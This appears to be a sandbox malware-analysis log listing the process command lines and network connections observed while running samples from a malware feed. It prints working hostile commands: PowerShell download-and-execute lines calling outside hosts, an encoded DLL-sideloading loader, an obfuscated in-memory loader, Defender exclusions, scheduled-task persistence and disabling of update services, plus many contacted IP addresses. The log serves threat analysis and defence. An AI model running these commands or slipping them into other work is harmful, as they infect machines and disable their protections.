C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\DOWNLO~1\URLHAU~1\CHROME~1.EXE"
C:\Users\Admin\DOWNLO~1\URLHAU~1\CHROME~1.EXE
C:\Users\Admin\DOWNLO~1\URLHAU~1\CHROME~1.EXE
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\F392TM~1.EXE"
C:\Users\Admin\AppData\Local\Temp\F392TM~1.EXE
C:\Users\Admin\AppData\Local\Temp\F392TM~1.EXE
C:\Windows\system32\msg.exe
msg * virus
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\DOWNLO~1\URLHAU~1\Aa_v3.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2292,i,5061204446278887501,13120279352438544852,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2272 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1760,i,5061204446278887501,13120279352438544852,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2452 /prefetch:3
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=1956,i,5061204446278887501,13120279352438544852,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2480 /prefetch:8
C:\Users\Admin\DOWNLO~1\URLHAU~1\Aa_v3.exe
C:\Users\Admin\DOWNLO~1\URLHAU~1\Aa_v3.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\DOWNLO~1\URLHAU~1\new.exe"
C:\Users\Admin\DOWNLO~1\URLHAU~1\new.exe
C:\Users\Admin\DOWNLO~1\URLHAU~1\new.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\DOWNLO~1\URLHAU~1\Update.exe"
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\DOWNLO~1\URLHAU~1\jeditor.exe"
C:\Users\Admin\DOWNLO~1\URLHAU~1\jeditor.exe
C:\Users\Admin\DOWNLO~1\URLHAU~1\jeditor.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3104,i,5061204446278887501,13120279352438544852,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3184 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3112,i,5061204446278887501,13120279352438544852,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3192 /prefetch:1
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Roaming\Network4726Man.cmd"
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\DOWNLO~1\URLHAU~1\chisel.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4480,i,5061204446278887501,13120279352438544852,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4464 /prefetch:1
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\System32\cmd.exe /c start C:\Users\Admin\AppData\Roaming\Network4726Man.cmd
C:\Users\Admin\DOWNLO~1\URLHAU~1\chisel.exe
C:\Users\Admin\DOWNLO~1\URLHAU~1\chisel.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\DOWNLO~1\URLHAU~1\svchost.exe"
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\DOWNLO~1\URLHAU~1\svchost.exe"
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\DOWNLO~1\URLHAU~1\Beefy.exe"
C:\Users\Admin\DOWNLO~1\URLHAU~1\Beefy.exe
C:\Users\Admin\DOWNLO~1\URLHAU~1\Beefy.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\DOWNLO~1\URLHAU~1\test26.exe"
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Users\Admin\DOWNLO~1\URLHAU~1\test26.exe
C:\Users\Admin\DOWNLO~1\URLHAU~1\test26.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "new" /tr "C:\Users\Admin\AppData\Roaming\new.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Roaming\Network4726Man.cmd
C:\Windows\SysWOW64\schtasks.exe
C:\Windows\System32\schtasks.exe /create /f /RL HIGHEST /sc minute /mo 1 /tn new /tr C:\Users\Admin\AppData\Roaming\new.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4780,i,5061204446278887501,13120279352438544852,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4740 /prefetch:8
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\DOWNLO~1\URLHAU~1\svchost.exe"
C:\Windows\system32\msg.exe
msg * virus
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\DOWNLO~1\URLHAU~1\Taskmgr.exe"
C:\Windows\System32\cmd.exe
cmd.exe /c powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JGNvdW50ZXIgPSAwOw0KJHB5bFBhdGggPSAiQzpcVXNlcnNcUHVibGljXHB5bGQuZGxsIjsNCmZvciAoOzspew0KCWlmICgkY291bnRlciAtbGUgMyl7DQoJCShOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoImh0dHBzOi8vZ2l0aHViLmNvbS91bnZkMDEvdW52bWFpbi9yYXcvbWFpbi91bjIvYm90cHJudC5kYXQiLCAkcHlsUGF0aCk7DQoJfQ0KCWVsc2V7DQoJCShOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoImh0dHA6Ly91bnZkd2wuY29tL3VuMi9ib3Rwcm50LmRhdCIsICRweWxQYXRoKTsNCgl9DQoJU3RhcnQtU2xlZXAgLVNlY29uZHMgMjsNCglpZiAoVGVzdC1QYXRoICRweWxQYXRoKXsNCgkJY21kIC9jIG1rZGlyICJcXD9cQzpcV2luZG93cyBcU3lzdGVtMzIiOw0KCQljbWQgL2MgeGNvcHkgL3kgIkM6XFdpbmRvd3NcU3lzdGVtMzJccHJpbnR1aS5leGUiICJDOlxXaW5kb3dzIFxTeXN0ZW0zMiI7DQoJCWNtZCAvYyBtb3ZlIC95ICJDOlxVc2Vyc1xQdWJsaWNccHlsZC5kbGwiICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmRsbCI7DQoJCVN0YXJ0LVNsZWVwIC1TZWNvbmRzIDI7DQoJCVN0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmV4ZSI7DQoJCWJyZWFrOw0KCX0NCgllbHNlew0KCQlbTmV0LlNlcnZpY2VQb2ludE1hbmFnZXJdOjpTZWN1cml0eVByb3RvY29sID0gW05ldC5TZWN1cml0eVByb3RvY29sVHlwZV06OlRsczEyOw0KCQlTdGFydC1TbGVlcCAtU2Vjb25kcyAyMDsJDQoJfQ0KCWlmICgkY291bnRlciAtZXEgMTApew0KCQlicmVhazsNCgl9DQoJJGNvdW50ZXIrKzsNCn0=')); Invoke-Expression $decoded;"
C:\Users\Admin\DOWNLO~1\URLHAU~1\Taskmgr.exe
C:\Users\Admin\DOWNLO~1\URLHAU~1\Taskmgr.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\DOWNLO~1\URLHAU~1\XBLKPF~1.EXE"
C:\Users\Admin\DOWNLO~1\URLHAU~1\XBLKPF~1.EXE
C:\Users\Admin\DOWNLO~1\URLHAU~1\XBLKPF~1.EXE
C:\Windows\system32\whoami.exe
whoami
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JGNvdW50ZXIgPSAwOw0KJHB5bFBhdGggPSAiQzpcVXNlcnNcUHVibGljXHB5bGQuZGxsIjsNCmZvciAoOzspew0KCWlmICgkY291bnRlciAtbGUgMyl7DQoJCShOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoImh0dHBzOi8vZ2l0aHViLmNvbS91bnZkMDEvdW52bWFpbi9yYXcvbWFpbi91bjIvYm90cHJudC5kYXQiLCAkcHlsUGF0aCk7DQoJfQ0KCWVsc2V7DQoJCShOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoImh0dHA6Ly91bnZkd2wuY29tL3VuMi9ib3Rwcm50LmRhdCIsICRweWxQYXRoKTsNCgl9DQoJU3RhcnQtU2xlZXAgLVNlY29uZHMgMjsNCglpZiAoVGVzdC1QYXRoICRweWxQYXRoKXsNCgkJY21kIC9jIG1rZGlyICJcXD9cQzpcV2luZG93cyBcU3lzdGVtMzIiOw0KCQljbWQgL2MgeGNvcHkgL3kgIkM6XFdpbmRvd3NcU3lzdGVtMzJccHJpbnR1aS5leGUiICJDOlxXaW5kb3dzIFxTeXN0ZW0zMiI7DQoJCWNtZCAvYyBtb3ZlIC95ICJDOlxVc2Vyc1xQdWJsaWNccHlsZC5kbGwiICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmRsbCI7DQoJCVN0YXJ0LVNsZWVwIC1TZWNvbmRzIDI7DQoJCVN0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmV4ZSI7DQoJCWJyZWFrOw0KCX0NCgllbHNlew0KCQlbTmV0LlNlcnZpY2VQb2ludE1hbmFnZXJdOjpTZWN1cml0eVByb3RvY29sID0gW05ldC5TZWN1cml0eVByb3RvY29sVHlwZV06OlRsczEyOw0KCQlTdGFydC1TbGVlcCAtU2Vjb25kcyAyMDsJDQoJfQ0KCWlmICgkY291bnRlciAtZXEgMTApew0KCQlicmVhazsNCgl9DQoJJGNvdW50ZXIrKzsNCn0=')); Invoke-Expression $decoded;"
C:\Windows\system32\msg.exe
msg * virus
C:\Windows\system32\msg.exe
msg * virus
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\msg.exe
msg * virus
C:\Windows\system32\msg.exe
msg * virus
C:\Windows\system32\msg.exe
msg * virus
C:\Windows\system32\msg.exe
msg * virus
C:\Users\Admin\AppData\Local\kreon.exe
C:\Users\Admin\AppData\Local\kreon.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\1729TM~1.EXE"
C:\Users\Admin\AppData\Roaming\powershell.exe
powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Local\Temp\1729TM~1.EXE
C:\Users\Admin\AppData\Local\Temp\1729TM~1.EXE
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\DOWNLO~1\URLHAU~1\file.exe"
C:\Users\Admin\DOWNLO~1\URLHAU~1\file.exe
C:\Users\Admin\DOWNLO~1\URLHAU~1\file.exe
C:\Users\Admin\AppData\Local\Temp\1729TM~1.EXE
C:\Users\Admin\AppData\Local\Temp\1729TM~1.EXE
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\kreon.exe"
C:\Users\Admin\AppData\Local\Temp\3582-490\kreon.exe
C:\Users\Admin\AppData\Local\Temp\3582-490\kreon.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Windows\sysnative\cmd.exe" /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://osecweb.ir/js/config_20.ps1')"
C:\Windows\system32\cmd.exe
C:\Windows\sysnative\cmd.exe /c powershell -command IEX(New-Object Net.Webclient).DownloadString('https://osecweb.ir/js/config_20.ps1')
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffcc78e46f8,0x7ffcc78e4708,0x7ffcc78e4718
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\DOWNLO~1\URLHAU~1\ipscan.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command IEX(New-Object Net.Webclient).DownloadString('https://osecweb.ir/js/config_20.ps1')
C:\Users\Admin\DOWNLO~1\URLHAU~1\ipscan.exe
C:\Users\Admin\DOWNLO~1\URLHAU~1\ipscan.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2136,8970677178570723263,14954177359958588593,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2116 /prefetch:2
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\Network4726Man.cmd';$ddkL='TrhqWFanshqWFfohqWFrmhqWFFihqWFnalhqWFBlhqWFochqWFkhqWF'.Replace('hqWF', ''),'DDPxXecoDPxXmDPxXprDPxXessDPxX'.Replace('DPxX', ''),'MaysmqinysmqMysmqodysmqulysmqeysmq'.Replace('ysmq', ''),'ReiHEpadiHEpLiiHEpnesiHEp'.Replace('iHEp', ''),'GCqdUetCqdUCuCqdUrCqdUreCqdUntPCqdUrCqdUocCqdUesCqdUsCqdU'.Replace('CqdU', ''),'InAKLIvoAKLIkAKLIeAKLI'.Replace('AKLI', ''),'LoJqASadJqAS'.Replace('JqAS', ''),'CopyfqFyTyfqFoyfqF'.Replace('yfqF', ''),'FrvXuAomvXuABvXuAasvXuAe6vXuA4StvXuArvXuAinvXuAgvXuA'.Replace('vXuA', ''),'CxbdihxbdianxbdigxbdieExbdixtexbdinxbdisixbdioxbdinxbdi'.Replace('xbdi', ''),'EleVQPZmeVQPZntVQPZAtVQPZ'.Replace('VQPZ', ''),'CNQbureaNQbutNQbueDNQbuecrNQbuypNQbutorNQbu'.Replace('NQbu', ''),'EoUdqnoUdqtoUdqryoUdqPoUdqoioUdqnoUdqtoUdq'.Replace('oUdq', ''),'ScSRUplcSRUitcSRU'.Replace('cSRU', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($ddkL[4])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function rInUE($tsSXg){$AjjqB=[System.Security.Cryptography.Aes]::Create();$AjjqB.Mode=[System.Security.Cryptography.CipherMode]::CBC;$AjjqB.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$AjjqB.Key=[System.Convert]::($ddkL[8])('N/y0OKPKBqPZJ+saNe6tgR7TAn10dih8XZ0HebZ+uEc=');$AjjqB.IV=[System.Convert]::($ddkL[8])('Ls3mytPz2eg1HzNec7G7VA==');$BtIij=$AjjqB.($ddkL[11])();$tfdFv=$BtIij.($ddkL[0])($tsSXg,0,$tsSXg.Length);$BtIij.Dispose();$AjjqB.Dispose();$tfdFv;}function UajxO($tsSXg){$coXbk=New-Object System.IO.MemoryStream(,$tsSXg);$PWDcH=New-Object System.IO.MemoryStream;$GMuYT=New-Object System.IO.Compression.GZipStream($coXbk,[IO.Compression.CompressionMode]::($ddkL[1]));$GMuYT.($ddkL[7])($PWDcH);$GMuYT.Dispose();$coXbk.Dispose();$PWDcH.Dispose();$PWDcH.ToArray();}$hqZyL=[System.IO.File]::($ddkL[3])([Console]::Title);$Hvhxu=UajxO (rInUE ([Convert]::($ddkL[8])([System.Linq.Enumerable]::($ddkL[10])($hqZyL, 5).Substring(2))));$LvPZo=UajxO (rInUE ([Convert]::($ddkL[8])([System.Linq.Enumerable]::($ddkL[10])($hqZyL, 6).Substring(2))));[System.Reflection.Assembly]::($ddkL[6])([byte[]]$LvPZo).($ddkL[12]).($ddkL[5])($null,$null);[System.Reflection.Assembly]::($ddkL[6])([byte[]]$Hvhxu).($ddkL[12]).($ddkL[5])($null,$null); "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Users\Admin\Downloads\UrlHausFiles\Video.scr
"C:\Users\Admin\Downloads\UrlHausFiles\Video.scr" /S
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start cmd /C "ping localhost -n 1 && start C:\Users\Admin\AppData\Local\kreon.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2136,8970677178570723263,14954177359958588593,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2784 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2136,8970677178570723263,14954177359958588593,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3004 /prefetch:8
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2136,8970677178570723263,14954177359958588593,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3580 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2136,8970677178570723263,14954177359958588593,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3592 /prefetch:1
C:\Windows\system32\msg.exe
msg * virus
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\DOWNLO~1\URLHAU~1\file.exe" >> NUL
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ping 127.0.0.1 && del C:\Users\Admin\DOWNLO~1\URLHAU~1\file.exe >> NUL
C:\Windows\system32\cmd.exe
cmd /C "ping localhost -n 1 && start C:\Users\Admin\AppData\Local\kreon.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2136,8970677178570723263,14954177359958588593,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4696 /prefetch:1
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.147.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | urlhaus.abuse.ch | udp |
| US | 151.101.66.49:443 | urlhaus.abuse.ch | tcp |
| N/A | 127.0.0.1:55402 | tcp | |
| US | 8.8.8.8:53 | 49.66.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3434.filelu.cloud | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | irp.cdn-website.com | udp |
| US | 8.8.8.8:53 | kolobrownsalesye-fong.com | udp |
| US | 216.158.238.61:80 | 216.158.238.61 | tcp |
| NL | 95.169.201.100:18960 | 95.169.201.100 | tcp |
| NL | 95.169.201.100:18960 | 95.169.201.100 | tcp |
| NL | 95.169.201.100:18960 | 95.169.201.100 | tcp |
| NL | 95.169.201.100:18960 | 95.169.201.100 | tcp |
| NL | 95.169.201.100:18960 | 95.169.201.100 | tcp |
| NL | 95.169.201.100:18960 | 95.169.201.100 | tcp |
| NL | 95.169.201.100:18960 | 95.169.201.100 | tcp |
| NL | 95.169.201.100:18960 | 95.169.201.100 | tcp |
| NL | 95.169.201.100:18960 | 95.169.201.100 | tcp |
| US | 66.165.227.66:80 | 66.165.227.66 | tcp |
| US | 66.165.227.66:80 | 66.165.227.66 | tcp |
| RU | 31.41.244.11:80 | 31.41.244.11 | tcp |
| RU | 31.41.244.11:80 | 31.41.244.11 | tcp |
| RU | 176.111.174.138:8000 | 176.111.174.138 | tcp |
| RU | 31.41.244.11:80 | 31.41.244.11 | tcp |
| RU | 31.41.244.11:80 | 31.41.244.11 | tcp |
| RU | 31.41.244.11:80 | 31.41.244.11 | tcp |
| HK | 43.155.93.125:80 | 43.155.93.125 | tcp |
| CN | 39.102.210.162:8080 | tcp | |
| CN | 39.102.210.162:8080 | tcp | |
| CN | 39.102.210.162:8080 | tcp | |
| CN | 39.102.210.162:8080 | tcp | |
| CN | 39.102.210.162:8080 | tcp | |
| CN | 123.60.37.61:9999 | tcp | |
| US | 136.0.44.4:8000 | 136.0.44.4 | tcp |
| RU | 31.41.244.11:80 | 31.41.244.11 | tcp |
| RU | 31.41.244.11:80 | 31.41.244.11 | tcp |
| TH | 165.154.184.75:80 | 165.154.184.75 | tcp |
| CN | 125.33.228.48:8085 | tcp | |
| CN | 125.33.228.48:8085 | tcp | |
| CN | 125.33.228.48:8085 | tcp | |
| CN | 123.130.204.103:8888 | tcp | |
| CN | 123.130.204.103:8888 | tcp | |
| ES | 81.42.249.132:1080 | 81.42.249.132 | tcp |
| CN | 183.30.204.105:81 | tcp | |
| CN | 183.30.204.105:81 | tcp | |
| CN | 183.30.204.105:81 | tcp | |
| CN | 123.130.204.103:8888 | tcp | |
| ES | 81.42.249.132:1080 | 81.42.249.132 | tcp |
| RU | 31.41.244.11:80 | 31.41.244.11 | tcp |
| DE | 49.12.117.119:80 | 49.12.117.119 | tcp |
| RU | 31.41.244.11:80 | 31.41.244.11 | tcp |
| JP | 121.1.252.90:80 | 121.1.252.90 | tcp |
| CN | 114.215.27.238:2324 | tcp | |
| CN | 101.229.61.157:8072 | tcp | |
| CN | 110.90.9.121:8072 | tcp | |
| CN | 114.215.27.238:8072 | tcp | |
| TR | 5.26.97.52:88 | 5.26.97.52 | tcp |
| JP | 122.31.166.101:80 | 122.31.166.101 | tcp |
| CA | 76.11.16.231:80 | 76.11.16.231 | tcp |
| US | 75.18.210.21:80 | 75.18.210.21 | tcp |
| HK | 219.77.72.53:80 | 219.77.72.53 | tcp |
| CA | 99.233.83.22:80 | 99.233.83.22 | tcp |
| CN | 110.40.250.173:2324 | tcp | |
| US | 67.190.47.69:8081 | 67.190.47.69 | tcp |
| CN | 124.70.36.56:80 | tcp | |
| CN | 121.235.184.125:9000 | tcp | |
| CN | 61.183.16.127:14417 | tcp | |
| CN | 58.208.14.94:88 | tcp | |
| TR | 178.242.54.178:88 | 178.242.54.178 | tcp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | cdn-downloads.com | udp |
| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| FR | 99.86.91.59:443 | irp.cdn-website.com | tcp |
| US | 8.8.8.8:53 | dctdownload.s3.amazonaws.com | udp |
| GB | 20.26.156.215:80 | github.com | tcp |
| GB | 20.26.156.215:80 | github.com | tcp |
| GB | 20.26.156.215:80 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | cdn-downloads-now.xyz | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | csg-app.com | udp |
| US | 67.23.237.28:443 | 3434.filelu.cloud | tcp |
| US | 67.23.237.28:443 | 3434.filelu.cloud | tcp |
| US | 67.23.237.28:443 | 3434.filelu.cloud | tcp |
| US | 67.23.237.28:443 | 3434.filelu.cloud | tcp |
| US | 67.23.237.28:80 | 3434.filelu.cloud | tcp |
| NL | 203.161.45.11:443 | cdn-downloads-now.xyz | tcp |
| IE | 52.92.1.41:443 | dctdownload.s3.amazonaws.com | tcp |
| IE | 52.92.20.105:443 | dctdownload.s3.amazonaws.com | tcp |
| US | 198.54.115.214:443 | kolobrownsalesye-fong.com | tcp |
| NL | 203.161.45.11:443 | cdn-downloads-now.xyz | tcp |
| US | 8.8.8.8:53 | a15aaa1.oss-cn-hongkong.aliyuncs.com | udp |
| US | 8.8.8.8:53 | src1.minibai.com | udp |
| US | 8.8.8.8:53 | monastery.mlnk.net | udp |
| US | 144.34.162.13:80 | 144.34.162.13 | tcp |
| US | 166.150.43.236:80 | 166.150.43.236 | tcp |
| KR | 146.56.118.137:80 | 146.56.118.137 | tcp |
| ES | 47.62.190.226:80 | 47.62.190.226 | tcp |
| CN | 101.35.228.105:8888 | tcp | |
| CN | 150.158.25.244:9000 | tcp | |
